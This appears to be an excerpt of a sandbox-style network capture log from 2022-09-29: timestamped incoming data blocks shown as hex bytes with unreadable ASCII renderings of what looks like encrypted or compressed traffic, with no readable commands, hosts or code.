                                                                                                                                                            2022-09-29 12:44:59 UTC6117INData Raw: 18 d1 27 b6 6d 75 16 7d bc 2f ca 7c f0 36 c9 df 8e fe b5 6e 14 4d ba 48 5b be 54 30 91 c7 34 24 7e 5d e8 42 e9 fd 51 c1 b9 b8 74 f3 26 f8 e0 7f d5 75 cd 00 4c 38 c7 fb 20 18 a9 36 50 d1 bb 59 19 af c9 0a f4 29 a4 90 4f c0 33 01 e7 d9 cf 08 a4 d1 3e 74 33 ef a7 28 bd 3b e7 a4 dc eb 84 eb c5 56 17 9e c6 78 0b ae 02 32 c0 be 4a 51 00 59 72 d5 88 b8 fb f5 2f b8 87 36 a6 58 e3 c2 a7 1f 9a 15 63 3c 0d 38 53 84 11 46 10 b8 fc 47 f8 8e b4 be 71 24 bb ec 6e 65 d8 e6 62 a3 3e 5c 59 83 9f a3 4a 71 0a 61 04 e0 21 a6 26 e2 7f 56 28 ab 5b d8 b8 fb 0b 84 2c 65 1d a5 fd 1c 8b 60 50 63 6f 47 b2 ea d4 e3 75 54 fc df 34 09 ba 4d 2a e8 70 e1 83 41 41 94 0c 8f b7 b7 64 3c 3d a2 c0 b5 91 4d 20 a3 98 39 81 bb bb 25 ed e0 52 da a4 2b 55 a5 84 49 72 f9 1b 6a 32 93 4c 75 43 d7 50
                                                                                                                                                            Data Ascii: 'mu}/|6nMH[T04$~]BQt&uL8 6PY)O3>t3(;Vx2JQYr/6Xc<8SFGq$neb>\YJqa!&V([,e`PcoGuT4M*pAAd<=M 9%R+UIrj2LuCP
                                                                                                                                                            2022-09-29 12:44:59 UTC6133INData Raw: 57 e1 4d 30 28 8b 31 76 d8 b9 ac 43 00 bf e4 1d ac 28 55 9a 21 29 fe 98 5f ed 82 b8 c7 75 1c 4a dc d7 f9 5f 7b b8 7a be 26 bf c6 17 ec bf 5e 32 93 81 12 ec 18 65 d4 c0 a8 c4 f5 26 fe 2f a8 60 37 2e d3 0b 66 9a 83 ec bb fb a6 4e be b2 39 fd 6d 4d fb 5a eb 05 f6 4c 94 18 54 e5 96 97 1d 9b fd 13 41 13 e7 1a b8 08 8b 08 56 0f 78 64 19 d4 c3 17 d6 15 0e 5d 05 a0 06 83 6d f8 8b ff 95 14 b4 a1 30 12 b1 4b b2 2d 7e 9e 8c d5 4a d5 95 37 22 c8 29 58 9c 81 d4 69 57 44 5c a1 f6 f4 0c 9b b6 41 57 18 0b d1 4b ba 41 38 c9 30 b7 f2 b2 2f 55 19 d1 91 ad 6b ab b0 e1 f2 11 00 fd b3 61 d1 b0 4b 5c 6b 30 7f 48 e3 20 32 70 7e 4f 93 8c f1 21 e1 fd 41 03 23 30 62 62 ff 61 69 a3 73 55 58 62 46 4a 60 40 9a da b7 7f be 06 ef 4e 28 1b 5a 21 aa 99 64 a9 c2 ba bd 0e 1e a2 25 1a b7 21
                                                                                                                                                            Data Ascii: WM0(1vC(U!)_uJ_{z&^2e&/`7.fN9mMZLTAVxd]m0K-~J7")XiWD\AWKA80/UkaK\k0H 2p~O!A#0bbaisUXbFJ`@N(Z!d%!
                                                                                                                                                            2022-09-29 12:44:59 UTC6149INData Raw: 70 18 fc 34 eb ac 24 41 6a 96 15 a4 1e 3f fb a3 e5 77 c9 65 18 b6 08 ad 6b a6 96 fc d3 20 02 fc 5f d7 cf 99 f9 90 ca c6 5c 01 93 c9 48 e6 8c 07 e4 d0 49 e2 79 51 0d 16 d7 42 41 e5 13 99 8f f9 b2 b2 a0 40 ea f5 15 f8 c4 ca 22 03 3a a2 7a a0 aa 26 30 55 cc 7d 65 6e 3e cd 99 83 fa 90 6f 36 8e ba f2 de f1 ca 00 f1 66 7e 2b 44 37 f6 48 e5 87 4a bc 08 a0 c2 18 40 af 35 3f 02 fd eb fe 87 c3 bf 6c 54 0a af 0e 1e d3 2c 53 03 58 19 90 b6 bb f4 d9 57 ba 52 6d 65 e6 90 5a 2b 0e 1d 9e 4d 21 d1 8d 91 5d 91 43 5f e1 2a 1f 9c 37 96 e5 6a 45 ed 74 5b 78 b3 eb 43 2d b9 39 24 f8 82 5f af 4c c2 67 f3 c8 a0 6d c2 07 da 95 75 b9 46 d5 47 f3 08 e7 49 d5 89 81 67 af 20 a1 d3 89 6a 19 15 50 d1 ac 67 b2 c9 b6 8e dc 11 53 74 6a fd 5c e2 ae a4 46 a8 9b 7e 61 b5 24 ae 63 ec ba 69 05
                                                                                                                                                            Data Ascii: p4$Aj?wek _\HIyQBA@":z&0U}en>o6f~+D7HJ@5?lT,SXWRmeZ+M!]C_*7jEt[xC-9$_LgmuFGIg jPgStj\F~a$ci
                                                                                                                                                            2022-09-29 12:44:59 UTC6165INData Raw: 1f 27 c0 a9 80 88 b2 67 ae 2d 82 49 e0 2a ce 44 04 92 3c fd a2 80 ca d2 1a 93 96 29 3f d5 fc 46 ea 41 e4 bb 5c 71 a1 7a 79 78 e2 92 e4 7f 0a e5 94 a9 ef 0e 19 81 ab 01 16 cc fa 91 a6 19 e7 ff a0 2b cb 48 4b 90 ff 44 46 30 58 8f 0e e8 64 07 d0 b9 52 37 82 44 d6 c9 9d e3 ac 23 e1 44 85 28 03 0d df 13 30 0f ae 5c a7 21 be 40 da 91 01 85 ff b8 39 93 3a fe 3c 77 3b 1a 14 b8 7c ac 20 f7 9f e7 80 71 14 56 ce 1a 40 92 b4 a3 26 df 21 ec 87 83 1c 90 9a 3c 51 00 88 c0 c3 1f 7e 21 a5 69 db 07 21 ad f0 00 64 a5 88 8a 17 d7 f4 22 9c 7d 6d 32 b9 c0 d1 61 2b 60 7c bd 7e 1a cc 63 dd 6c 94 a6 be 45 97 b8 2d 97 83 a4 99 b5 00 27 9e 4a e2 ec 2c e6 8e a8 4a a6 cb 93 5e fb 69 05 ad c7 9b 11 1e 6b f4 08 5b 70 d0 4b 91 17 b1 36 96 6b c6 0f d1 46 94 67 76 a6 a3 f5 5b c4 be 2e 7b
                                                                                                                                                            Data Ascii: 'g-I*D<)?FA\qzyx+HKDF0XdR7D#D(0\!@9:<w;| qV@&!<Q~!i!d"}m2a+`|~clE-'J,J^ik[pK6kFgv[.{
                                                                                                                                                            2022-09-29 12:44:59 UTC6181INData Raw: dd 2e 55 64 21 8f 52 45 ab 78 c4 c7 4c f0 bd d7 84 53 99 0e 60 c0 7e ee 7d 7e cd 2d 9f 58 aa 6f f8 88 20 f1 42 d7 4a 4b 78 2d 65 ab da 7e d7 a1 5d d8 6d ba 9c 60 b0 23 b7 59 1d d4 c4 f2 9d af cf cc d9 d9 ea 96 26 97 96 90 76 c7 ce 1e f8 53 ea ce 2e bc f6 8e 8d 37 c2 36 fe 67 3f 0b 3d 7b 50 1c 93 d4 98 ec da 60 2e 53 20 bd c6 7d 3b 32 bd 14 6a 97 25 28 c6 73 c4 09 e4 df 10 a7 c5 1c 6a d3 2f 7e 79 41 91 bd a8 e5 cd 88 a8 52 f6 04 95 97 de 6d 88 22 3e 71 01 a0 f9 17 e1 d0 78 f8 f0 36 eb 2b d0 6d cc bf dc 95 30 3b ca 14 67 3e 4f 97 1c 02 80 09 5f 18 0a b3 cb 63 c6 8f e9 18 fb 32 eb 08 20 d6 89 e9 45 0b fa 56 c2 58 ae 70 18 62 ce 1f b0 2d e8 bd 53 cf ef 27 51 13 79 03 db 5c 3f 1c 6d 7f 71 54 3d 60 40 0e a7 bc b1 d9 2b e5 2e 09 d4 51 99 84 36 5e 71 ac e9 7b 39
                                                                                                                                                            Data Ascii: .Ud!RExLS`~}~-Xo BJKx-e~]m`#Y&vS.76g?={P`.S };2j%(sj/~yARm">qx6+m0;g>O_c2 EVXpb-S'Qy\?mqT=`@+.Q6^q{9
                                                                                                                                                            2022-09-29 12:44:59 UTC6197INData Raw: da 19 5a 12 22 98 04 c7 d5 31 84 fd 12 42 e9 2b 0f 89 f9 db 66 33 2e d9 6c 6d d8 5d 71 69 e6 70 9b 29 f4 da db 96 d9 52 0d 5b 36 5b d4 a3 7b b0 7b ee 03 5e 4a cf 15 90 fe f7 cb da 12 bc 4a c0 ab d9 49 33 dd 67 67 55 c4 25 ce 49 20 67 7b 57 81 f5 d0 9e 77 7f bd 99 cb a5 74 38 b3 62 07 2a e3 1f 02 a4 62 77 38 48 0f 05 95 5d 90 bd 27 1a a1 43 5b 78 45 ea a5 40 fa d2 b9 25 f7 8f 2b e5 33 9d 41 6b d7 3c a4 28 ae 7d e3 0c ee 9b 66 b2 e0 b1 71 3e 52 ef 7c 6e 62 fc 86 bd ee a9 53 af 0f 89 87 80 a7 8f aa 15 6b 4f c4 f7 8f 3b eb 18 0e ce 60 e2 56 a4 24 f3 31 f5 24 39 2b 3e de 1f 67 fe 46 11 c0 cd 14 a3 fc c7 f4 eb 28 ab 9a 6c 08 3f be 88 35 3a a6 74 ce ba 91 fc db 6f b1 b5 67 9f bf 38 da 1b 47 d5 cf 50 54 9b 8c 46 24 b9 7e fc 22 54 42 46 18 4c 61 2b ac 52 df 5a d5
                                                                                                                                                            Data Ascii: Z"1B+f3.lm]qip)R[6[{{^JJI3ggU%I g{Wwt8b*bw8H]'C[xE@%+3Ak<(}fq>R|nbSkO;`V$1$9+>gF(l?5:tog8GPTF$~"TBFLa+RZ
                                                                                                                                                            2022-09-29 12:44:59 UTC6213INData Raw: 8f 78 a4 d7 db db 79 93 3e 23 19 28 34 ed 55 b4 8c f0 45 9e d1 b0 86 73 86 78 61 0d a1 42 6b 65 05 8a 9f 7e a6 c8 70 9a 17 57 a5 18 02 b7 5a 20 3f f8 5f c6 46 e1 00 b8 52 73 76 81 67 ab b6 a9 34 6c ce e1 f7 1e 52 f8 11 aa 6e e7 56 5e 60 cd be 3a 26 ae c9 c0 51 b0 16 27 5b 72 a1 ab 3e 93 e3 0f 0f f2 41 ef af ee 93 4d 71 42 7b 19 b6 6c 18 1c d9 50 1e 0b 82 a3 a5 cc 95 c8 50 38 2c 65 93 6f 16 1d af fd 89 e9 d5 32 67 91 68 04 d9 ad 9e 36 b1 57 f7 44 4e 26 f3 f7 38 a6 72 97 98 b3 44 53 af 5e 03 c6 06 ae fe af 07 42 3d b8 e2 78 a2 d0 c3 ff b4 c8 95 8e 43 82 b3 d3 ab 2b 92 f1 50 af d7 38 21 11 19 f4 7e 50 ee 57 c0 d9 6a 65 9a cd 22 fc 3d 27 9c 60 cf 9f c4 06 c5 6a 87 fb 29 1f 71 b5 a4 4b 7c da 1b f1 c6 36 8b 23 6d c9 8a 7c ec 53 f1 2a c8 30 7f 83 f5 87 9d a0 da
                                                                                                                                                            Data Ascii: xy>#(4UEsxaBke~pWZ ?_FRsvg4lRnV^`:&Q'[r>AMqB{lPP8,eo2gh6WDN&8rDS^B=xC+P8!~PWje"='`j)qK|6#m|S*0
                                                                                                                                                            2022-09-29 12:44:59 UTC6229INData Raw: 89 a5 03 37 da c1 fa b1 cd d3 1f bf 40 6e d3 b0 ae 5a a0 d6 a4 5f 8d 72 6a d0 ee fd 6e 58 24 4a d3 2e bc 5c 92 79 ee 75 97 ab 7f c1 2d 4e 4a a4 9b 62 a3 47 a7 08 dd 41 91 30 79 d0 4c 81 53 39 f1 c9 be 36 c2 80 51 b1 2d 32 89 fa 35 3a a4 f6 99 a9 e9 bf 6a 0b b0 ef ac 64 e5 ae 65 4f 7e 7b 42 51 10 65 76 9a 69 39 c4 0a 7c 2f 24 d1 3e 65 13 67 09 1e 50 2c 1c 31 b2 ea 25 9d 42 3c 25 87 72 44 ac 62 83 ac 9a e8 ce 8a 66 50 bb ad b7 48 7f 1d 15 f0 7c da cd 70 7f 08 2d 68 94 a8 40 9a 5d 8e c1 d6 a5 e7 26 f8 93 f6 97 3f 2f 6d 51 7e aa c2 b0 c9 83 bf e6 a7 a8 ab 0a 32 6b 77 28 77 2a 05 0e 8f 31 a2 92 92 07 d1 2a 35 df 71 7f 52 b5 dd 2c df 09 33 58 bd a7 45 16 1f c9 09 4f 36 83 99 99 8a a7 db cb 8c d6 0e a8 8c 2b 6c 97 51 67 ac 94 85 db 14 72 6c 91 f5 e3 13 82 40 d7
                                                                                                                                                            Data Ascii: 7@nZ_rjnX$J.\yu-NJbGA0yLS96Q-25:jdeO~{BQevi9|/$>egP,1%B<%rDbfPH|p-h@]&?/mQ~2kw(w*1*5qR,3XEO6+lQgrl@
                                                                                                                                                            2022-09-29 12:44:59 UTC6245INData Raw: 94 89 bb cb dc d1 65 8f 05 cf 17 57 8a 4b 75 43 32 76 35 fc 62 4c 57 d8 b1 ac 82 34 0e f5 9a 79 d0 56 7e dd ba 54 47 df 8e ca 55 fe be 00 86 95 94 7d 01 69 9f 0b 7a 86 6f ea 45 5b db 12 b6 bc ed 58 4e 5c f5 85 ac 8d b0 00 8e 86 38 78 ee 58 0d 24 08 2d 9d 88 a4 54 96 bf 4d 13 23 cc 9f ec f2 f5 cb ff 3d 02 84 5c 01 f7 f5 23 08 fc f3 27 3a 70 aa 25 a2 e9 9f 13 6e 04 b9 41 28 21 40 5e f9 48 7c 83 e9 1e 33 94 9d 2a 8b 76 c1 c0 99 e7 6b 6a df e3 c1 8b 2c 4d fa 95 e9 a9 a6 5c 1c a2 b2 02 89 fa 9d 0f e2 88 4b 5a 1c 46 ec b0 f3 39 b5 12 46 3a c1 a6 b6 78 f0 2d 67 4a fe d5 f8 6a 28 a7 2a 2e e7 a4 a0 50 dc 91 71 39 4a 46 4a 68 b8 d5 aa 81 62 59 a3 0d 67 df eb 43 46 6d 40 68 ec 4e 7e 14 1a 8b 70 b9 5c 75 c6 43 82 94 22 00 8c 0b f4 11 ce e8 70 df 8b 95 e8 81 54 85 cd
                                                                                                                                                            Data Ascii: eWKuC2v5bLW4yV~TGU}izoE[XN\8xX$-TM#=\#':p%nA(!@^H|3*vkj,M\KZF9F:x-gJj(*.Pq9JFJhbYgCFm@hN~p\uC"pT
                                                                                                                                                            2022-09-29 12:44:59 UTC6261INData Raw: 91 47 99 62 15 4a ff 58 57 93 7f 44 8c aa 2b 0e c2 86 b1 24 d2 c1 f5 87 47 14 7e 02 55 15 61 7d a3 b9 b8 3b f0 53 0b 53 3e 1a d9 7b eb 42 1a c8 7a d4 e5 98 a3 f0 51 fb 2b e9 2b 69 3c 6d 94 b1 4f 95 c5 e8 71 81 60 78 aa fe 45 23 ef 0b f3 b5 48 c4 0a a7 ed 32 39 75 9e 90 fb 44 f3 13 6c 6b a7 81 9f f9 2c 83 21 d5 dd b0 3d 25 64 a3 c8 12 57 8e 46 54 9b 80 09 a7 52 52 77 d5 d0 9d 7b 50 4d 54 6a 4c a2 7c e7 85 53 1d 24 3e 87 bc 46 5d 64 7b fe 2e 54 82 13 31 a4 20 6d 4e 6d f5 47 a2 fc 77 39 6d f0 ad 99 66 5e 80 36 3d c6 6d 87 53 1d 5f 84 c6 00 35 0e 10 2e 7d c2 b2 33 4a 36 0e 9a 42 44 e4 43 23 f3 14 8e 6a 3d 1d 3e 9f 8f e4 aa 7d 18 b7 01 db 16 fe c2 d5 d7 9b 0f e2 49 71 82 87 4c 8d 84 40 a8 88 dd ca 7a 24 00 97 fe 7b fb 51 b8 53 29 a8 39 6e f3 72 5f 7c 50 68 53
                                                                                                                                                            Data Ascii: GbJXWD+$G~Ua};SS>{BzQ++i<mOq`xE#H29uDlk,!=%dWFTRRw{PMTjL|S$>F]d{.T1 mNmGw9mf^6=mS_5.}3J6BDC#j=>}IqL@z${QS)9nr_|PhS
                                                                                                                                                            2022-09-29 12:44:59 UTC6277INData Raw: 87 e9 1b c8 89 4b 45 36 a4 36 e3 a4 e6 6b ed 3c 61 44 e7 af f3 8f 6e d2 bb b0 1c 0c 22 a4 9e 77 0e b2 89 e5 7b da c4 50 50 a1 c3 50 75 f1 c8 d0 55 7c f8 ab bf 7b 68 42 b0 e2 8c 85 56 51 d9 fc 02 79 5c c7 7c 30 f4 bb ce 78 81 3d c8 be 6b 24 21 d8 e6 78 ad 57 f0 6d 52 10 75 dc 38 4d 2a 7a c7 28 17 23 4f 1f c6 3a c4 11 88 4d 53 93 80 8c 72 f0 38 8b 66 61 69 43 06 b4 ab d4 48 52 db 54 0f fe f1 11 f4 c4 25 0e 58 7d e9 65 82 ab 8b b3 cb 2f e1 d4 7b cf 2c 98 e2 23 87 ad 72 11 42 f4 f6 36 d4 60 d4 7f a5 c3 f4 75 6e 6f f5 00 2f c3 76 c4 ef 8a c7 1d 2a bd 79 e8 80 76 bc a7 05 00 81 22 b7 dd 26 d1 8e 98 04 4f ae c0 65 2e 72 72 b3 41 7e ab bc 38 8b e2 41 c2 bd a8 cd cc 24 f1 74 00 4d fb 09 47 63 de 71 95 3d fe e2 75 27 c3 a8 58 47 31 71 c4 48 26 57 12 56 aa de 36 5f
                                                                                                                                                            Data Ascii: KE66k<aDn"w{PPPuU|{hBVQy\|0x=k$!xWmRu8M*z(#O:MSr8faiCHRT%X}e/{,#rB6`uno/v*yv"&Oe.rrA~8A$tMGcq=u'XG1qH&WV6_
                                                                                                                                                            2022-09-29 12:44:59 UTC6293INData Raw: e2 90 8e 3a 9e 24 cb 2a 50 b9 69 4f 91 97 b5 a9 70 23 c1 82 03 8e cb f2 b7 f3 4a ed 07 96 bd ec f2 53 93 79 a6 3f 68 2b 17 39 df ca 5b c3 b1 f4 66 1f d0 28 bd 3f 66 0b 15 c1 a1 8b 64 56 1d b9 7f 87 89 c4 d7 ce 85 57 08 50 bf 69 50 4f 78 ca 6d 78 6c b0 0f 6d 72 a3 d5 b2 79 22 26 f1 50 99 5d 72 ce 43 1e cb 28 ac 7d a7 28 ed 9d 4c f9 a4 ba ab f3 e9 21 dc b4 90 85 a9 2f 3c 85 d7 5a 51 90 63 0f d6 8c 42 18 b0 6c 4f 0b 99 a8 45 69 74 f3 a7 26 0b 23 b2 75 ad 5d be 4d 57 97 7c 0a 15 35 14 d7 40 60 af de ba 52 51 c4 cf 9d eb 8f 19 17 11 c6 c5 3e 0d 97 e5 00 d6 ab da f1 58 49 72 f0 1c f1 c9 8f be 95 68 a7 bf 3a f4 e7 5c 9d 47 77 e8 21 30 9f 87 d1 f5 72 74 d1 04 e3 30 3f aa 8d 1d 00 03 3b 47 24 87 30 12 76 01 fd c3 c0 5c d8 60 83 01 b3 65 6a 28 cf 25 5a 31 33 0d 23
                                                                                                                                                            Data Ascii: :$*PiOp#JSy?h+9[f(?fdVWPiPOxmxlmry"&P]rC(}(L!/<ZQcBlOEit&#u]MW|5@`RQ>XIrh:\Gw!0rt0?;G$0v\`ej(%Z13#
                                                                                                                                                            2022-09-29 12:44:59 UTC6309INData Raw: 34 3f 6c 10 25 34 45 0b 3b e7 dd aa ae 85 ad b2 0c cd ff 4a de 27 e3 72 7d 2e c5 16 be f5 25 05 69 ec e8 4c 5a 8c bb d3 54 1e 8b e6 a5 66 1c dc 08 34 5a 45 e3 5c 1c 0d 62 cd a4 12 8e 80 8f 35 03 0a a6 88 18 0d 66 09 82 f2 c8 c2 8c f2 6a c3 52 c5 bd 0f bf f8 c6 6a 02 c8 03 d5 d8 d3 ad ba 9b 39 a1 f9 17 42 e8 e6 bb 14 7a 8c a3 5d fe 79 66 1c a7 26 2d f5 81 6e 60 ef cb a2 e6 87 ff d9 b6 f4 7c 6d f1 92 12 35 58 1d 42 9e f9 fc f6 e9 e7 06 43 01 7d c2 26 f4 3e e3 34 22 e7 11 8f 0e b2 dd ed d9 bf 86 24 e1 27 3c 00 47 e2 8f de 4b 1b 2e a6 54 3f f1 47 28 46 53 53 5b 86 ec e9 3b c9 dd bb 42 77 a9 ca 9a 32 1c 6f 93 ad 75 f0 79 b8 64 8d 05 62 15 5e 6c f1 cc 41 08 68 5e d1 94 0f 0d 4b 49 82 14 57 86 32 c0 3b cf d1 d8 54 b7 0e 6e ee 1a a1 58 a4 af c8 65 82 86 ad 08 72
                                                                                                                                                            Data Ascii: 4?l%4E;J'r}.%iLZTf4ZE\b5fjRj9Bz]yf&-n`|m5XBC}&>4"$'<GK.T?G(FSS[;Bw2ouydb^lAh^KIW2;TnXer
                                                                                                                                                            2022-09-29 12:44:59 UTC6325INData Raw: c7 be be fc 95 f4 26 7a 1f eb f7 4c cf 9f 27 79 32 94 10 86 db 24 91 d0 5b 98 a5 84 e9 12 92 54 86 56 9b aa b9 51 48 e7 38 51 29 fe 11 ce 44 0d 5c 3f b9 c3 c8 01 8e 85 77 56 ce c8 51 4f 6a f0 a9 80 00 bb 9b 28 ea 0f e4 ec fd 58 94 b8 a2 c5 ba 58 08 dd a8 2d fe a4 0a 95 94 04 b0 7e 33 10 0c 40 fd d4 bb ce 03 29 99 e2 a2 aa 1b 54 07 b7 3a d3 36 6f 91 91 60 aa 0b 2e ab 08 ef 86 df f8 d5 0b b3 4d 29 61 2a d7 8f 30 ac a3 a4 85 a4 81 34 f5 ea 93 4b cc df 79 24 78 13 2d 0e 87 65 90 8e ff c8 cb 99 91 23 b6 53 a5 1e c9 e9 44 7b 4e 5b 5f f2 17 be e6 e2 a7 1b 22 d5 19 79 ff 8b 5b b2 9c 19 41 6b 0d 71 9d ec 70 2e f6 92 23 a4 8f 96 8b 1a 4a 4c 7a 99 05 d6 4d 1f 46 82 92 4d bc ce 72 2b 49 8c d6 47 e8 30 2a 96 82 a1 2e f9 8a d1 92 65 62 fa 3f 6b 19 c1 63 f6 6d 0a 04 f9
                                                                                                                                                            Data Ascii: &zL'y2$[TVQH8Q)D\?wVQOj(XX-~3@)T:6o`.M)a*04Ky$x-e#SD{N[_"y[Akqp.#JLzMFMr+IG0*.eb?kcm
                                                                                                                                                            2022-09-29 12:44:59 UTC6341INData Raw: ed 94 fb cf 3c ad ab 3e e8 54 69 7f cc 30 c0 c9 ed 0b 4d 47 2e 30 b6 96 d6 ed 31 16 5c 7d 12 14 d0 b7 b2 53 a7 f8 f8 56 5f 16 b9 0a b9 9d 0b 47 ec 1a ca d0 f6 14 77 97 53 7b 16 0f aa ca 50 ae 31 48 51 5d b5 2d 7c 72 3d 37 7d 84 c2 25 19 a2 21 dd 51 03 cd af 17 e5 0e a2 dc ff 28 75 d3 30 2d 77 f0 55 53 a0 fa 4d a2 43 66 b0 b8 21 5b bc 32 04 01 bf 11 2c d9 79 87 ec b7 83 44 3a ed cb 34 32 73 92 c7 3b 1d 56 e1 0d 81 49 5d f9 66 be 07 d6 7f c6 a8 6b 4f 5a 94 0e 16 fb 07 3c d7 df 9d 40 2a b8 77 55 44 00 e9 85 ed 69 03 e3 38 58 1b a8 e3 81 20 bb dc 2c fb b2 2f e5 ec 11 5d ed 42 d2 41 f3 4c b1 c8 ab e6 e7 f3 62 bf 87 d5 ec c2 f7 c3 92 90 3a ad 77 f5 e6 ca f4 b9 f2 08 18 36 f1 09 7a c0 4f 56 76 65 b7 1b 6e 4b a6 fe 54 7b be 47 d0 52 f4 b2 13 4d 0f c3 b4 5a 5d 4d
                                                                                                                                                            Data Ascii: <>Ti0MG.01\}SV_GwS{P1HQ]-|r=7}%!Q(u0-wUSMCf![2,yD:42s;VI]fkOZ<@*wUDi8X ,/]BALb:w6zOVvenKT{GRMZ]M
                                                                                                                                                            2022-09-29 12:44:59 UTC6357INData Raw: 2f 8c 67 49 4b e5 1f 84 6a 4c d6 de e3 f2 0a 15 a6 19 6d 1a 69 37 74 cc 47 9e 3e 3b c1 90 94 e4 56 15 d7 8f 13 1a 5c 21 0a f4 ab f1 dd ce 65 3c 32 9d b6 24 46 c4 d9 bc 10 26 ac ed 83 c2 19 bd 60 08 3e bf 2f 67 c8 50 38 35 23 47 da cd ef 7a 0e 4c 92 d3 d1 14 38 63 b3 88 71 f6 9e 8f e2 ed a4 83 9d c9 c8 45 19 16 6a 59 ce 02 b2 61 ab fc 12 06 45 fe 88 e1 5b f7 a3 e8 98 03 cd aa 7c ea 76 38 45 2e 50 50 3c af ce 0e f6 b5 6c 33 e7 42 fa ef c7 b7 93 d6 b3 2a 7c 77 13 08 8a 99 f5 b4 c2 bf 47 b7 9c d6 11 4e 1a 27 54 bf 47 d4 2a 9a 6f e1 1c c6 8e 8c cd fa d8 06 38 83 fc cd c5 9e 3d 6f 44 56 67 49 df 03 03 69 74 95 ac f4 80 1a 9e 03 d6 e5 ae 2b 78 80 a8 ff db 8a 23 04 ad 61 56 66 bd bf 75 b3 ea 20 22 a5 4d d8 44 b2 82 63 3d 59 88 6f 47 f0 d2 66 c9 94 f0 68 da 00 84
                                                                                                                                                            Data Ascii: /gIKjLmi7tG>;V\!e<2$F&`>/gP85#GzL8cqEjYaE[|v8E.PP<l3B*|wGN'TG*o8=oDVgIit+x#aVfu "MDc=YoGfh
                                                                                                                                                            2022-09-29 12:44:59 UTC6373INData Raw: ce d8 48 6d 61 fb 0f db dd fd e7 54 6c f7 38 d4 e6 2e a2 99 61 e9 5a 72 8a 6b be cd 4d 84 44 c6 22 7d a6 a6 4b de 48 79 8c 9b 03 69 9e 96 95 be b1 24 de 6b 29 dc 58 c7 b7 84 6b bd a2 56 1f 4d 24 ff d5 e2 cc cd 8b d0 3e 36 98 8d 0b 74 6b b7 8f 6d e2 7d 21 1a c2 22 a8 2d d5 31 d3 fe 1a f9 df cc f4 83 f7 15 fe ae 6c 3b b3 68 2b 8d 1c 30 fe b7 8e c6 be cb e2 7b 40 f8 7a bd be cd 4c 30 de 97 fe 1f 27 9a cf 4e 4a 45 4a d9 1e c7 79 56 3f 5e e9 f4 77 44 4c 99 7f 47 60 aa 85 be ea f5 46 62 c7 6b 6e df 9d 32 02 e1 30 0d 63 ac d1 c7 bd b2 02 ea 77 29 38 31 0a 3a 62 bb f5 56 74 3a 7a b2 c6 00 00 98 d0 ca 1b c0 ac ee 89 7f 08 d1 04 d9 af 01 cb b4 45 4c 82 b1 4d cc 78 66 6a 99 f7 05 48 c7 63 fb 9d 07 e7 5e 35 78 45 54 39 0a 93 49 89 d4 85 0b ce fd 6d a4 37 f0 21 f2 ab
                                                                                                                                                            Data Ascii: HmaTl8.aZrkMD"}KHyi$k)XkVM$>6tkm}!"-1l;h+0{@zL0'NJEJyV?^wDLG`Fbkn20cw)81:bVt:zELMxfjHc^5xET9Im7!
                                                                                                                                                            2022-09-29 12:44:59 UTC6389INData Raw: 1c 2c 2e 15 9c 11 f4 97 6b 44 12 50 b6 a4 ea 08 df a8 02 d7 25 5a 53 f4 09 db 13 99 84 ab 01 26 98 74 ec 77 17 b8 74 25 40 26 aa 5b 0b ec 6a 70 e2 87 80 53 3f 90 ee 93 6c 73 62 2b 0d aa 3d e8 4a 47 8b 95 11 fe 21 3b 69 66 92 2a 66 b6 b0 87 95 17 e5 d4 47 41 df 60 b4 f2 40 d4 11 30 23 ed 51 1b 4c f4 42 30 7d 8d bd 9e 6a 9e 07 6f 2b bc c4 d4 54 c1 55 97 6b 25 51 ed 00 73 78 81 7f 41 09 0c 34 d1 2c a9 a2 c7 ab 83 44 e5 5d 85 76 54 08 fe 48 69 ca 84 c9 a7 e6 69 eb 53 58 7b c6 10 6f 82 90 0f 6e e6 2a 40 4d c0 b6 ce ea 3b e2 fb c5 84 25 78 d4 72 d8 5a a5 1d ba b7 dc 42 ef 24 c7 34 42 b2 dc ce e0 9a b9 0c 07 62 97 ac 64 58 90 c1 8e fb 46 4d 28 e5 51 46 3c 9d 23 c1 1b ff e0 ce 6d c3 92 6a a7 5f 03 e2 50 b1 eb 5d 41 17 ed f0 07 dd 12 de 59 6c 0c 1c e9 a8 10 5a ae
                                                                                                                                                            Data Ascii: ,.kDP%ZS&twt%@&[jpS?lsb+=JG!;if*fGA`@0#QLB0}jo+TUk%QsxA4,D]vTHiiSX{on*@M;%xrZB$4BbdXFM(QF<#mj_P]AYlZ
                                                                                                                                                            2022-09-29 12:44:59 UTC6405INData Raw: 79 58 c4 cc af d8 99 96 e1 0f 9f 88 6d ff f6 96 ae 5d c4 14 73 59 a9 83 72 a8 9e e7 69 30 48 4e df db 16 bc 6e 1d f4 92 6c d1 7b a8 10 ae ba 7d f7 60 77 73 9a 49 7b aa ad 22 a9 1d b8 dc 91 a3 b8 21 70 8a 88 ef 6b 7c fb f7 73 76 31 04 b1 ac a1 fa 2d ec d2 4c 85 61 30 ff 31 c3 b3 e6 be 88 e4 35 05 a4 20 1e 7f 29 98 70 22 cc 5a 1b 52 43 a1 ea 1c 6f 1b a8 16 87 4d 80 32 6d cd 43 5a ea c9 e7 7c 7f 84 48 17 88 db 1c cf 2d 94 7e c7 08 31 81 6a f1 78 ca 34 90 de 3b 9d ae 9f 9d da fe b7 b1 1f 39 8f f3 c3 3e 45 cd e6 15 e6 11 77 d5 7a 2d a3 2d 63 08 da bf 8c d2 27 04 3d d0 85 af fe 94 3a 46 37 6b a9 8f 99 cb c1 2e 1c 57 77 1a dc d3 e6 60 5a f5 fa f6 ec 38 5d 4b f7 9a 3f 24 57 57 a7 bd 0a 32 59 bb d6 28 c3 b6 29 f9 ed b6 d2 07 f6 6e a6 bf b5 38 26 76 f4 dc b3 ce 86
                                                                                                                                                            Data Ascii: yXm]sYri0HNnl{}`wsI{"!pk|sv1-La015 )p"ZRCoM2mCZ|H-~1jx4;9>Ewz--c'=:F7k.Ww`Z8]K?$WW2Y()n8&v
